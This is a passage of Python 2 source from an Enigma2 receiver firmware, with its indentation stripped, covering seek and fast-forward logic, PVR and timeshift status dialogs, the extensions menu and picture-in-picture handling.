elif eDVBVolumecontrol.getInstance().isMuted():
eDVBVolumecontrol.getInstance().volumeUnMute()
def doSeek(self, pts):
seekable = self.getSeek()
if seekable is None:
return
else:
seekable.seekTo(pts)
return
def doSeekRelativeAvoidStall(self, pts):
global jump_pts_adder
global jump_last_pos
global jump_last_pts
seekable = self.getSeek()
if seekable and config.seek.withjumps_avoid_zero.getValue():
position = seekable.getPlayPosition()
if jump_last_pos and jump_last_pts:
if abs(position[1] - jump_last_pos[1]) < 9000 and pts == jump_last_pts:
jump_pts_adder += pts
jump_last_pts = pts
pts += jump_pts_adder
else:
jump_pts_adder = 0
jump_last_pts = pts
else:
jump_last_pts = pts
jump_last_pos = position
self.doSeekRelative(pts)
def doSeekRelative(self, pts):
try:
if "<class 'Screens.InfoBar.InfoBar'>" in `self`:
if InfoBarTimeshift.timeshiftEnabled(self):
length = InfoBarTimeshift.ptsGetLength(self)
position = InfoBarTimeshift.ptsGetPosition(self)
if length is None or position is None:
return
if position + pts >= length:
InfoBarTimeshift.evEOF(self, position + pts - length)
return
if position + pts < 0:
InfoBarTimeshift.evSOF(self, position + pts)
self.showAfterSeek()
return
except:
from sys import exc_info
print "[InfoBarGenerics] error in 'def doSeekRelative'", exc_info()[:2]
seekable = self.getSeek()
if seekable is None or int(seekable.getLength()[1]) < 1:
return
else:
prevstate = self.seekstate
setpause = getMachineBuild() in ('hd51','vs1500') and 1 # 0/1 enable workaround for some boxes these in pause mode not seek to new position
if self.seekstate == self.SEEK_STATE_EOF:
if prevstate == self.SEEK_STATE_PAUSE:
self.setSeekState(self.SEEK_STATE_PAUSE)
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif setpause and self.seekstate == self.SEEK_STATE_PAUSE:
print '[InfoBarGenerics] workaround jump in pause mode'
setpause = 2
self.setSeekState(self.SEEK_STATE_PLAY)
seekable.seekRelative(pts < 0 and -1 or 1, abs(pts))
if setpause == 2:
self.setSeekState(self.SEEK_STATE_PAUSE)
if abs(pts) > 100 and config.usage.show_infobar_on_skip.value:
self.showAfterSeek()
return
def DoSeekAction(self):
global seek_withjumps_muted
if self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()):
self.doSeekRelativeAvoidStall(self.seekAction * long(config.seek.withjumps_forwards_ms.getValue()) * 90)
elif self.seekAction < 0:
self.doSeekRelativeAvoidStall(self.seekAction * long(config.seek.withjumps_backwards_ms.getValue()) * 90)
for c in self.onPlayStateChanged:
if self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()): # Forward
c((0, self.seekAction, 0, ">> %dx" % self.seekAction))
elif self.seekAction < 0: # Backward
c((0, self.seekAction, 0, "<< %dx" % abs(self.seekAction)))
if self.seekAction == 0:
self.LastseekAction = False
self.doPause(False)
seek_withjumps_muted = False
self.setSeekState(self.SEEK_STATE_PLAY)
def isServiceTypeTS(self):
ref = self.session.nav.getCurrentlyPlayingServiceReference()
isTS = False
if ref is not None:
servincetype = ServiceReference(ref).getType()
if servincetype == 1:
isTS = True
return isTS
def seekFwd(self):
if config.seek.withjumps.value and not self.isServiceTypeTS():
self.seekFwd_new()
else:
self.seekFwd_old()
def seekBack(self):
if config.seek.withjumps.value and not self.isServiceTypeTS():
self.seekBack_new()
else:
self.seekBack_old()
def seekFwd_new(self):
global seek_withjumps_muted
self.LastseekAction = True
self.doPause(True)
seek_withjumps_muted = True
if self.seekAction >= 0:
self.seekAction = self.getHigher(abs(self.seekAction), config.seek.speeds_forward.value) or config.seek.speeds_forward.value[-1]
else:
self.seekAction = -self.getLower(abs(self.seekAction), config.seek.speeds_backward.value)
if (self.seekAction > 1) and (self.seekAction <= int(config.seek.withjumps_after_ff_speed.getValue())): # use fastforward for the configured speeds
self.setSeekState(self.makeStateForward(self.seekAction))
elif self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()): # we first need to go the play state, to stop fastforward
self.setSeekState(self.SEEK_STATE_PLAY)
def seekBack_new(self):
global seek_withjumps_muted
self.LastseekAction = True
self.doPause(True)
seek_withjumps_muted = True
if self.seekAction <= 0:
self.seekAction = -self.getHigher(abs(self.seekAction), config.seek.speeds_backward.value) or -config.seek.speeds_backward.value[-1]
else:
self.seekAction = self.getLower(abs(self.seekAction), config.seek.speeds_forward.value)
if (self.seekAction > 1) and (self.seekAction <= int(config.seek.withjumps_after_ff_speed.getValue())): # use fastforward for the configured forwards speeds
self.setSeekState(self.makeStateForward(self.seekAction))
def seekFwd_old(self):
seek = self.getSeek()
if seek and not (seek.isCurrentlySeekable() & 2):
if not self.fast_winding_hint_message_showed and (seek.isCurrentlySeekable() & 1):
self.session.open(MessageBox, _("No fast winding possible yet.. but you can use the number buttons to skip forward/backward!"), MessageBox.TYPE_INFO, timeout=10)
self.fast_winding_hint_message_showed = True
return
return 0
if self.seekstate == self.SEEK_STATE_PLAY:
self.setSeekState(self.makeStateForward(int(config.seek.enter_forward.value)))
elif self.seekstate == self.SEEK_STATE_PAUSE:
if len(config.seek.speeds_slowmotion.value):
self.setSeekState(self.makeStateSlowMotion(config.seek.speeds_slowmotion.value[-1]))
else:
self.setSeekState(self.makeStateForward(int(config.seek.enter_forward.value)))
elif self.seekstate == self.SEEK_STATE_EOF:
pass
elif self.isStateForward(self.seekstate):
speed = self.seekstate[1]
if self.seekstate[2]:
speed /= self.seekstate[2]
speed = self.getHigher(speed, config.seek.speeds_forward.value) or config.seek.speeds_forward.value[-1]
self.setSeekState(self.makeStateForward(speed))
elif self.isStateBackward(self.seekstate):
speed = -self.seekstate[1]
if self.seekstate[2]:
speed /= self.seekstate[2]
speed = self.getLower(speed, config.seek.speeds_backward.value)
if speed:
self.setSeekState(self.makeStateBackward(speed))
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif self.isStateSlowMotion(self.seekstate):
speed = self.getLower(self.seekstate[2], config.seek.speeds_slowmotion.value) or config.seek.speeds_slowmotion.value[0]
self.setSeekState(self.makeStateSlowMotion(speed))
def seekBack_old(self):
seek = self.getSeek()
if seek and not (seek.isCurrentlySeekable() & 2):
if not self.fast_winding_hint_message_showed and (seek.isCurrentlySeekable() & 1):
self.session.open(MessageBox, _("No fast winding possible yet.. but you can use the number buttons to skip forward/backward!"), MessageBox.TYPE_INFO, timeout=10)
self.fast_winding_hint_message_showed = True
return
return 0
seekstate = self.seekstate
if seekstate == self.SEEK_STATE_PLAY:
self.setSeekState(self.makeStateBackward(int(config.seek.enter_backward.value)))
elif seekstate == self.SEEK_STATE_EOF:
self.setSeekState(self.makeStateBackward(int(config.seek.enter_backward.value)))
self.doSeekRelative(-6)
elif seekstate == self.SEEK_STATE_PAUSE:
self.doSeekRelative(-1)
elif self.isStateForward(seekstate):
speed = seekstate[1]
if seekstate[2]:
speed /= seekstate[2]
speed = self.getLower(speed, config.seek.speeds_forward.value)
if speed:
self.setSeekState(self.makeStateForward(speed))
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif self.isStateBackward(seekstate):
speed = -seekstate[1]
if seekstate[2]:
speed /= seekstate[2]
speed = self.getHigher(speed, config.seek.speeds_backward.value) or config.seek.speeds_backward.value[-1]
self.setSeekState(self.makeStateBackward(speed))
elif self.isStateSlowMotion(seekstate):
speed = self.getHigher(seekstate[2], config.seek.speeds_slowmotion.value)
if speed:
self.setSeekState(self.makeStateSlowMotion(speed))
else:
self.setSeekState(self.SEEK_STATE_PAUSE)
self.pts_lastseekspeed = self.seekstate[1]
def seekFwdManual(self, fwd=True):
if config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.fwdSeekTo, MinuteInput)
def seekBackManual(self, fwd=False):
if config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.rwdSeekTo, MinuteInput)
def seekFwdSeekbar(self, fwd=True):
if not config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.fwdSeekTo, MinuteInput)
def fwdSeekTo(self, minutes):
self.doSeekRelative(minutes * 60 * 90000)
def seekBackSeekbar(self, fwd=False):
if not config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.rwdSeekTo, MinuteInput)
def rwdSeekTo(self, minutes):
self.doSeekRelative(-minutes * 60 * 90000)
def checkSkipShowHideLock(self):
if self.seekstate == self.SEEK_STATE_PLAY or self.seekstate == self.SEEK_STATE_EOF:
self.lockedBecauseOfSkipping = False
self.unlockShow()
else:
wantlock = self.seekstate != self.SEEK_STATE_PLAY
if config.usage.show_infobar_on_skip.value:
if self.lockedBecauseOfSkipping and not wantlock:
self.unlockShow()
self.lockedBecauseOfSkipping = False
if wantlock and not self.lockedBecauseOfSkipping:
self.lockShow()
self.lockedBecauseOfSkipping = True
def calcRemainingTime(self):
seekable = self.getSeek()
if seekable is not None:
len = seekable.getLength()
try:
tmp = self.cueGetEndCutPosition()
if tmp:
len = (False, tmp)
except:
pass
pos = seekable.getPlayPosition()
speednom = self.seekstate[1] or 1
speedden = self.seekstate[2] or 1
if not len[0] and not pos[0]:
if len[1] <= pos[1]:
return 0
time = (len[1] - pos[1]) * speedden / (90 * speednom)
return time
return False
def __evEOF(self):
global seek_withjumps_muted
if self.seekstate == self.SEEK_STATE_EOF:
return
else:
if seek_withjumps_muted and eDVBVolumecontrol.getInstance().isMuted():
print 'STILL MUTED AFTER FFWD/FBACK !!!!!!!! so we unMute'
seek_withjumps_muted = False
eDVBVolumecontrol.getInstance().volumeUnMute()
seekstate = self.seekstate
if self.seekstate != self.SEEK_STATE_PAUSE:
self.setSeekState(self.SEEK_STATE_EOF)
if seekstate not in (self.SEEK_STATE_PLAY, self.SEEK_STATE_PAUSE):
seekable = self.getSeek()
if seekable is not None:
seekable.seekTo(-1)
self.doEofInternal(True)
if seekstate == self.SEEK_STATE_PLAY:
self.doEofInternal(True)
else:
self.doEofInternal(False)
return
def doEofInternal(self, playing):
pass
def __evSOF(self):
self.setSeekState(self.SEEK_STATE_PLAY)
self.doSeek(0)
class InfoBarPVRState:
def __init__(self, screen=PVRState, force_show = False):
self.onChangedEntry = [ ]
self.onPlayStateChanged.append(self.__playStateChanged)
self.pvrStateDialog = self.session.instantiateDialog(screen)
self.pvrStateDialog.setAnimationMode(0)
self.onShow.append(self._mayShow)
self.onHide.append(self.pvrStateDialog.hide)
self.force_show = force_show
def createSummary(self):
return InfoBarMoviePlayerSummary
def _mayShow(self):
if self.has_key("state") and not config.usage.movieplayer_pvrstate.value:
self["state"].setText("")
self["statusicon"].setPixmapNum(6)
self["speed"].setText("")
if self.shown and self.seekstate != self.SEEK_STATE_EOF and not config.usage.movieplayer_pvrstate.value:
self.pvrStateDialog.show()
self.startHideTimer()
def __playStateChanged(self, state):
playstateString = state[3]
state_summary = playstateString
if self.pvrStateDialog.has_key("statusicon"):
self.pvrStateDialog["state"].setText(playstateString)
if playstateString == '>':
self.pvrStateDialog["statusicon"].setPixmapNum(0)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 0
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(0)
self["speed"].setText("")
elif playstateString == '||':
self.pvrStateDialog["statusicon"].setPixmapNum(1)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 1
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(1)
self["speed"].setText("")
elif playstateString == 'END':
self.pvrStateDialog["statusicon"].setPixmapNum(2)
self.pvrStateDialog["speed"].setText("")
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 2
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(2)
self["speed"].setText("")
elif playstateString.startswith('>>'):
speed = state[3].split()
self.pvrStateDialog["statusicon"].setPixmapNum(3)
self.pvrStateDialog["speed"].setText(speed[1])
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 3
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(3)
self["speed"].setText(speed[1])
elif playstateString.startswith('<<'):
speed = state[3].split()
self.pvrStateDialog["statusicon"].setPixmapNum(4)
self.pvrStateDialog["speed"].setText(speed[1])
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 4
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(4)
self["speed"].setText(speed[1])
elif playstateString.startswith('/'):
self.pvrStateDialog["statusicon"].setPixmapNum(5)
self.pvrStateDialog["speed"].setText(playstateString)
speed_summary = self.pvrStateDialog["speed"].text
statusicon_summary = 5
if self.has_key("state") and config.usage.movieplayer_pvrstate.value:
self["state"].setText(playstateString)
self["statusicon"].setPixmapNum(5)
self["speed"].setText(playstateString)
for cb in self.onChangedEntry:
cb(state_summary, speed_summary, statusicon_summary)
# if we return into "PLAY" state, ensure that the dialog gets hidden if there will be no infobar displayed
if not config.usage.show_infobar_on_skip.value and self.seekstate == self.SEEK_STATE_PLAY and not self.force_show:
self.pvrStateDialog.hide()
else:
self._mayShow()
class InfoBarTimeshiftState(InfoBarPVRState):
def __init__(self):
InfoBarPVRState.__init__(self, screen=TimeshiftState, force_show=True)
self.onPlayStateChanged.append(self.__timeshiftEventName)
self.onHide.append(self.__hideTimeshiftState)
def _mayShow(self):
if config.usage.enableVodMode.value:
name = None
ext = ['.3g2',
'.3gp',
'.asf',
'.asx',
'.avi',
'.flv',
'.m2ts',
'.mkv',
'.mov',
'.mp4',
'.mpg',
'.mpeg',
'.rm',
'.swf',
'.vob',
'.wmv']
if self.session.nav.getCurrentlyPlayingServiceReference():
name = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
if self.shown and self.timeshiftEnabled() and self.isSeekable():
InfoBarTimeshift.ptsSeekPointerSetCurrentPos(self)
if config.timeshift.showinfobar.value:
self['TimeshiftSeekPointerActions'].setEnabled(True)
self.pvrStateDialog.show()
if config.usage.enableVodMode.value:
if name == True and self.isSeekable() and url.endswith(tuple(ext)):
InfoBarTimeshift.ptsSeekPointerSetCurrentPos(self)
if config.timeshift.showinfobar.value:
self['TimeshiftSeekPointerActions'].setEnabled(True)
self.pvrStateDialog.show()
if not self.isSeekable():
self.startHideTimer()
return
def __hideTimeshiftState(self):
self['TimeshiftSeekPointerActions'].setEnabled(False)
self.pvrStateDialog.hide()
def __timeshiftEventName(self, state):
name = None
if self.session.nav.getCurrentlyPlayingServiceReference():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
if self.timeshiftEnabled() and os.path.exists('%spts_livebuffer_%s.meta' % (config.usage.timeshift_path.value, self.pts_currplaying)):
readmetafile = open('%spts_livebuffer_%s.meta' % (config.usage.timeshift_path.value, self.pts_currplaying), 'r')
servicerefname = readmetafile.readline()[0:-1]
eventname = readmetafile.readline()[0:-1]
readmetafile.close()
self.pvrStateDialog['eventname'].setText(eventname)
elif config.usage.enableVodMode.value:
ext = ['.3g2',
'.3gp',
'.asf',
'.asx',
'.avi',
'.flv',
'.m2ts',
'.mkv',
'.mov',
'.mp4',
'.mpg',
'.mpeg',
'.rm',
'.swf',
'.vob',
'.wmv']
if str(url).endswith(tuple(ext)):
self.pvrStateDialog['eventname'].setText(name)
else:
self.pvrStateDialog['eventname'].setText('')
else:
self.pvrStateDialog['eventname'].setText('')
return
class InfoBarShowMovies:
# i don't really like this class.
# it calls a not further specified "movie list" on up/down/movieList,
# so this is not more than an action map
def __init__(self):
self["MovieListActions"] = HelpableActionMap(self, "InfobarMovieListActions",
{
"movieList": (self.showMovies, _("Open the movie list")),
"up": (self.up, _("Open the movie list")),
"down": (self.down, _("Open the movie list"))
})
from Screens.PiPSetup import PiPSetup
class InfoBarExtensions:
EXTENSION_SINGLE = 0
EXTENSION_LIST = 1
def __init__(self):
self.list = []
if config.plisettings.ColouredButtons.value:
self["InstantExtensionsActions"] = HelpableActionMap(self, "InfobarExtensions",
{
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugin browser..")),
"showEventInfo": (self.SelectopenEventView, _("Show the infomation on current event.")),
"openTimerList": (self.showTimerList, _("Show the list of timers.")),
"openAutoTimerList": (self.showAutoTimerList, _("Show the list of AutoTimers.")),
"openEPGSearch": (self.showEPGSearch, _("Search the epg for current event.")),
"openIMDB": (self.showIMDB, _("Search IMDb for information about current event.")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openDreamPlex": (self.showDreamPlex, _("Show the DreamPlex player...")),
}, 1) # lower priority
else:
self["InstantExtensionsActions"] = HelpableActionMap(self, "InfobarExtensions",
{
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugin browser..")),
"showDreamPlex": (self.showDreamPlex, _("Show the DreamPlex player...")),
"showEventInfo": (self.SelectopenEventView, _("Show the infomation on current event.")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
}, 1) # lower priority
self.addExtension(extension = self.getLogManager, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getOsd3DSetup, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getCCcamInfo, type = InfoBarExtensions.EXTENSION_LIST)
self.addExtension(extension = self.getOScamInfo, type = InfoBarExtensions.EXTENSION_LIST)
if config.usage.show_restart_network_extensionslist.getValue() is True:
self.addExtension(extension = self.getRestartNetwork, type = InfoBarExtensions.EXTENSION_LIST)
for p in plugins.getPlugins(PluginDescriptor.WHERE_EXTENSIONSINGLE):
p(self)
def SelectopenEventView(self):
try:
self.openEventView()
except:
pass
def getLMname(self):
return _("Log Manager")
def getLogManager(self):
if config.logmanager.showinextensions.value:
return [((boundFunction(self.getLMname), boundFunction(self.openLogManager), lambda: True), None)]
else:
return []
def getRestartNetworkname(self):
return _("Restart Network")
def getRestartNetwork(self):
return [((boundFunction(self.getRestartNetworkname), boundFunction(self.openRestartNetwork), lambda: True), None)]
def get3DSetupname(self):
return _("OSD 3D Setup")
def getOsd3DSetup(self):
if config.osd.show3dextensions .value:
return [((boundFunction(self.get3DSetupname), boundFunction(self.open3DSetup), lambda: True), None)]
else:
return []
def getCCname(self):
return _("CCcam Info")
def getCCcamInfo(self):
if pathExists('/usr/bin/'):
softcams = os.listdir('/usr/bin/')
for softcam in softcams:
if softcam.lower().startswith('cccam') and config.cccaminfo.showInExtensions.value:
return [((boundFunction(self.getCCname), boundFunction(self.openCCcamInfo), lambda: True), None)] or []
else:
return []
def getOSname(self):
return _("OScam Info")
def getOScamInfo(self):
if pathExists('/usr/bin/'):
softcams = os.listdir('/usr/bin/')
for softcam in softcams:
if softcam.lower().startswith('oscam') and config.oscaminfo.showInExtensions.value:
return [((boundFunction(self.getOSname), boundFunction(self.openOScamInfo), lambda: True), None)] or []
else:
return []
def addExtension(self, extension, key = None, type = EXTENSION_SINGLE):
self.list.append((type, extension, key))
if config.usage.sort_extensionslist.value:
self.list.sort()
def updateExtension(self, extension, key = None):
self.extensionsList.append(extension)
if key is not None:
if self.extensionKeys.has_key(key):
key = None
if key is None:
for x in self.availableKeys:
if not self.extensionKeys.has_key(x):
key = x
break
if key is not None:
self.extensionKeys[key] = len(self.extensionsList) - 1
def updateExtensions(self):
self.extensionsList = []
self.availableKeys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "red", "green", "yellow", "blue" ]
self.extensionKeys = {}
for x in self.list:
if x[0] == self.EXTENSION_SINGLE:
self.updateExtension(x[1], x[2])
else:
for y in x[1]():
self.updateExtension(y[0], y[1])
def showExtensionSelection(self):
self.updateExtensions()
extensionsList = self.extensionsList[:]
keys = []
list = []
colorlist = []
for x in self.availableKeys:
if self.extensionKeys.has_key(x):
entry = self.extensionKeys[x]
extension = self.extensionsList[entry]
if extension[2]():
name = str(extension[0]())
if self.availableKeys.index(x) < 10:
list.append((extension[0](), extension))
else:
colorlist.append((extension[0](), extension))
keys.append(x)
extensionsList.remove(extension)
else:
extensionsList.remove(extension)
if config.usage.sort_extensionslist.value:
list.sort()
for x in colorlist:
list.append(x)
list.extend([(x[0](), x) for x in extensionsList])
keys += [""] * len(extensionsList)
self.session.openWithCallback(self.extensionCallback, ChoiceBox, title=_("Please choose an extension..."), list = list, keys = keys, skin_name = "ExtensionsList")
def extensionCallback(self, answer):
if answer is not None:
answer[1][1]()
def showPluginBrowser(self):
# from Screens.PluginBrowser import PluginBrowser
# self.session.open(PluginBrowser)
from OPENDROID.BluePanel import BluePanel
self.session.open(BluePanel)
def openCCcamInfo(self):
from Screens.CCcamInfo import CCcamInfoMain
self.session.open(CCcamInfoMain)
def openOScamInfo(self):
from Screens.OScamInfo import OscamInfoMenu
self.session.open(OscamInfoMenu)
def showTimerList(self):
self.session.open(TimerEditList)
def openLogManager(self):
from Screens.LogManager import LogManager
self.session.open(LogManager)
def open3DSetup(self):
from Screens.UserInterfacePositioner import OSD3DSetupScreen
self.session.open(OSD3DSetupScreen)
def openRestartNetwork(self):
try:
from OPENDROID.RestartNetwork import RestartNetwork
self.session.open(RestartNetwork)
except:
print'[INFOBARGENERICS] failed to restart network'
def showAutoTimerList(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/AutoTimer/plugin.pyo"):
from Plugins.Extensions.AutoTimer.plugin import main, autostart
from Plugins.Extensions.AutoTimer.AutoTimer import AutoTimer
from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
self.autopoller = AutoPoller()
self.autotimer = AutoTimer()
try:
self.autotimer.readXml()
except SyntaxError as se:
self.session.open(
MessageBox,
_("Your config file is not well-formed:\n%s") % (str(se)),
type = MessageBox.TYPE_ERROR,
timeout = 10
)
return
# Do not run in background while editing, this might screw things up
if self.autopoller is not None:
self.autopoller.stop()
from Plugins.Extensions.AutoTimer.AutoTimerOverview import AutoTimerOverview
self.session.openWithCallback(
self.editCallback,
AutoTimerOverview,
self.autotimer
)
else:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def editCallback(self, session):
# XXX: canceling of GUI (Overview) won't affect config values which might have been changed - is this intended?
# Don't parse EPG if editing was canceled
if session is not None:
# Save xml
self.autotimer.writeXml()
# Poll EPGCache
self.autotimer.parseEPG()
# Start autopoller again if wanted
if config.plugins.autotimer.autopoll.value:
if self.autopoller is None:
from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller
self.autopoller = AutoPoller()
self.autopoller.start()
# Remove instance if not running in background
else:
self.autopoller = None
self.autotimer = None
def showEPGSearch(self):
from Plugins.Extensions.EPGSearch.EPGSearch import EPGSearch
s = self.session.nav.getCurrentService()
if s:
info = s.info()
event = info.getEvent(0) # 0 = now, 1 = next
if event:
name = event and event.getEventName() or ''
else:
name = self.session.nav.getCurrentlyPlayingServiceOrGroup().toString()
name = name.split('/')
name = name[-1]
name = name.replace('.',' ')
name = name.split('-')
name = name[0]
if name.endswith(' '):
name = name[:-1]
if name:
self.session.open(EPGSearch, name, False)
else:
self.session.open(EPGSearch)
else:
self.session.open(EPGSearch)
def showIMDB(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/IMDb/plugin.pyo"):
from Plugins.Extensions.IMDb.plugin import IMDB
s = self.session.nav.getCurrentService()
if s:
info = s.info()
event = info.getEvent(0) # 0 = now, 1 = next
name = event and event.getEventName() or ''
self.session.open(IMDB, name)
else:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaPlayer(self):
if isinstance(self, InfoBarExtensions):
if isinstance(self, InfoBar):
try: # falls es nicht installiert ist
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showDreamPlex(self):
if os.path.exists("/usr/lib/enigma2/python/Plugins/Extensions/DreamPlex/plugin.pyo"):
from Plugins.Extensions.DreamPlex.plugin import DPS_MainMenu
self.session.open(DPS_MainMenu)
else:
self.session.open(MessageBox, _("The DreamPlex plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
from Tools.BoundFunction import boundFunction
import inspect
# depends on InfoBarExtensions
class InfoBarPlugins:
def __init__(self):
self.addExtension(extension = self.getPluginList, type = InfoBarExtensions.EXTENSION_LIST)
def getPluginName(self, name):
return name
def getPluginList(self):
l = []
for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EXTENSIONSMENU):
args = inspect.getargspec(p.__call__)[0]
if len(args) == 1 or len(args) == 2 and isinstance(self, InfoBarChannelSelection):
l.append(((boundFunction(self.getPluginName, p.name), boundFunction(self.runPlugin, p), lambda: True), None, p.name))
l.sort(key = lambda e: e[2]) # sort by name
return l
def runPlugin(self, plugin):
if isinstance(self, InfoBarChannelSelection):
plugin(session = self.session, servicelist = self.servicelist)
else:
plugin(session = self.session)
from Components.Task import job_manager
class InfoBarJobman:
def __init__(self):
self.addExtension(extension = self.getJobList, type = InfoBarExtensions.EXTENSION_LIST)
def getJobList(self):
if config.usage.jobtaksextensions.value:
return [((boundFunction(self.getJobName, job), boundFunction(self.showJobView, job), lambda: True), None) for job in job_manager.getPendingJobs()]
else:
return []
def getJobName(self, job):
return "%s: %s (%d%%)" % (job.getStatustext(), job.name, int(100*job.progress/float(job.end)))
def showJobView(self, job):
from Screens.TaskView import JobView
job_manager.in_background = False
self.session.openWithCallback(self.JobViewCB, JobView, job)
def JobViewCB(self, in_background):
job_manager.in_background = in_background
# depends on InfoBarExtensions
class InfoBarPiP:
def __init__(self):
try:
self.session.pipshown
except:
self.session.pipshown = False
self.lastPiPService = None
if SystemInfo["PIPAvailable"] and isinstance(self, InfoBarEPG):
self["PiPActions"] = HelpableActionMap(self, "InfobarPiPActions",
{
"activatePiP": (self.activePiP, self.activePiPName),
})
if self.allowPiP:
self.addExtension((self.getShowHideName, self.showPiP, lambda: True), "blue")
self.addExtension((self.getMoveName, self.movePiP, self.pipShown), "green")
self.addExtension((self.getSwapName, self.swapPiP, self.pipShown), "yellow")
self.addExtension((self.getTogglePipzapName, self.togglePipzap, self.pipShown), "red")
else:
self.addExtension((self.getShowHideName, self.showPiP, self.pipShown), "blue")
self.addExtension((self.getMoveName, self.movePiP, self.pipShown), "green")
self.lastPiPServiceTimeoutTimer = eTimer()
self.lastPiPServiceTimeoutTimer.callback.append(self.clearLastPiPService)
def pipShown(self):
return self.session.pipshown
def pipHandles0Action(self):
return self.pipShown() and config.usage.pip_zero_button.value != "standard"
def getShowHideName(self):
if self.session.pipshown:
return _("Disable Picture in Picture")
else:
return _("Activate Picture in Picture")
def getSwapName(self):
return _("Swap services")
def getMoveName(self):
return _("Picture in Picture Setup")
def getTogglePipzapName(self):
slist = self.servicelist
if slist and slist.dopipzap:
return _("Zap focus to main screen")
return _("Zap focus to Picture in Picture")
def togglePipzap(self):
if not self.session.pipshown:
self.showPiP()
slist = self.servicelist
if slist and self.session.pipshown:
slist.togglePipzap()
if slist.dopipzap:
currentServicePath = slist.getCurrentServicePath()
self.servicelist.setCurrentServicePath(self.session.pip.servicePath, doZap=False)
self.session.pip.servicePath = currentServicePath
def showPiP(self):
self.lastPiPServiceTimeoutTimer.stop()
slist = self.servicelist
if self.session.pipshown:
if slist and slist.dopipzap:
self.togglePipzap()
if self.session.pipshown:
lastPiPServiceTimeout = int(config.usage.pip_last_service_timeout.value)
if lastPiPServiceTimeout >= 0:
self.lastPiPService = self.session.pip.getCurrentServiceReference()
if lastPiPServiceTimeout:
self.lastPiPServiceTimeoutTimer.startLongTimer(lastPiPServiceTimeout)
del self.session.pip
if SystemInfo["LCDMiniTV"]:
if config.lcd.modepip.value >= "1":
print '[LCDMiniTV] disable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modeminitv.value)
f.close()
self.session.pipshown = False
if hasattr(self, "ScreenSaverTimerStart"):
self.ScreenSaverTimerStart()
else:
service = self.session.nav.getCurrentService()
info = service and service.info()
if info:
xres = str(info.getInfo(iServiceInformation.sVideoWidth))
if info and int(xres) <= 720 or getMachineBuild() != 'blackbox7405':
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.setAnimationMode(0)
self.session.pip.show()
newservice = self.lastPiPService or self.session.nav.getCurrentlyPlayingServiceReference() or self.servicelist.servicelist.getCurrent()
if self.session.pip.playService(newservice):
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
if SystemInfo["LCDMiniTVPiP"] and int(config.lcd.modepip.value) >= 1:
print '[LCDMiniTV] enable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modepip.value)
f.close()
f = open("/proc/stb/vmpeg/1/dst_width", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_height", "w")
f.write("0")
f.close()
f = open("/proc/stb/vmpeg/1/dst_apply", "w")
f.write("1")
f.close()
else:
newservice = self.session.nav.getCurrentlyPlayingServiceReference() or self.servicelist.servicelist.getCurrent()
if self.session.pip.playService(newservice):
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
if SystemInfo["LCDMiniTVPiP"] and int(config.lcd.modepip.value) >= 1:
print '[LCDMiniTV] enable PIP'
f = open("/proc/stb/lcd/mode", "w")
f.write(config.lcd.modepip.value)
f.close()
